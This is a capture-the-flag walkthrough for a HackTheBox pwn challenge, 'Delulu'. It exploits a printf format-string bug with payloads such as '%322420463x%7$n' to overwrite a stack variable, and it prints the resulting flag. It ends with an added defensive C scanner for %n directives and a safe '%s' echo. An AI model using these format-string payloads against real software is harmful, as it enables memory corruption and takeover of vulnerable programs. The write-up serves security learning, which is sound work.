Delulu [pwn]

Recognition protocol initiated. Please present your face for scanning.

Pwn - 300 points

Walkthrough

We start by downloading the source files.

We are given a binary, delulu. Opening it with Ghidra, we can find a few interesting lines:

  long local_48;
  long *local_40;
  undefined8 user_input;
  ...
  read(0,&user_input,0x1f);
  printf("\n[!] Checking.. ");
  printf((char *)&user_input);
  if (local_48 == 0x1337beef) {
    delulu();
  }

The function delulu prints the flag, so we need to set local_48 to 0x1337beef. We can't set this value directly, but the second printf call passes the user input as its format string. This is a format string vulnerability, so we can use it to write the value 0x1337beef to the address of local_48.

You can find more information about format string exploits here.

Let's build our payload step by step:

AAAAAAAA%8$p

This returns the 8th argument on the stack, which is our 8 A's. (We can use gdb to make debugging easier.)

AAAAAAAA%7$n

This writes 8 (the number of characters printed so far) through the 7th argument on the stack, which points to local_48.

We need to write 0x1337beef, so printf must output 0x1337beef characters before it reaches the %7$n. This is 322420463 characters in decimal.

We can do this with the following payload, which uses a field width so that printf generates the padding itself:

%322420463x%7$n

Connecting to the server and providing this input gives us the flag after 'some' time:

1c157380
You managed to deceive the robot, here's your new identity: HTB{m45t3r_0f_d3c3pt10n}
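
A defender-side view of the payloads above, as an added example that is not part of the original walkthrough or the challenge binary: scan_format reports what a string would do if it reached printf as the format argument, and echo_safe is the corrected form of the printf((char *)&user_input) call. The names fmt_report, digits, scan_format and echo_safe are hypothetical, and count is only a lower bound because conversions without a width are counted as zero characters.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* What a string would do if it reached printf() as the format argument. */
struct fmt_report {
    int directives;       /* conversion specifications found */
    int writes;           /* %n conversions, i.e. memory writes */
    int write_arg;        /* positional index of the last %n (0 = not positional) */
    unsigned long count;  /* lower bound on the value the last %n would store */
};

/* Parse a run of decimal digits and advance the cursor past it. */
static unsigned long digits(const char **s)
{
    unsigned long v = 0;
    while (isdigit((unsigned char)**s)) v = v * 10 + (unsigned long)(*(*s)++ - '0');
    return v;
}

/* Walk the string the way printf parses it, without formatting anything. */
struct fmt_report scan_format(const char *s)
{
    struct fmt_report r = {0, 0, 0, 0};
    unsigned long out = 0;                        /* characters emitted so far */
    while (*s) {
        if (*s++ != '%') { out++; continue; }     /* ordinary character */
        if (*s == '%') { out++; s++; continue; }  /* "%%" prints one '%' */
        int pos = 0;
        unsigned long width = digits(&s);
        if (*s == '$') { pos = (int)width; s++; width = 0; }  /* "N$" selects argument N */
        while (*s && strchr("-+ #0*", *s)) s++;   /* flags and '*' width */
        if (width == 0) width = digits(&s);
        if (*s == '.') { s++; digits(&s); }       /* precision, ignored */
        while (*s && strchr("hlqjztL", *s)) s++;  /* length modifiers */
        if (!*s) break;                           /* truncated directive */
        r.directives++;
        if (*s == 'n') { r.writes++; r.write_arg = pos; r.count = out; }
        else out += width;                        /* output is padded to at least width */
        s++;
    }
    return r;
}

/* Hardened form of the echo: the input is data under a fixed "%s" format. */
int echo_safe(char *dst, size_t n, const char *input)
{
    return snprintf(dst, n, "%s", input);
}
```

Any input for which scan_format reports writes > 0 would have modified memory in the original binary; with echo_safe the same bytes are simply printed back.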
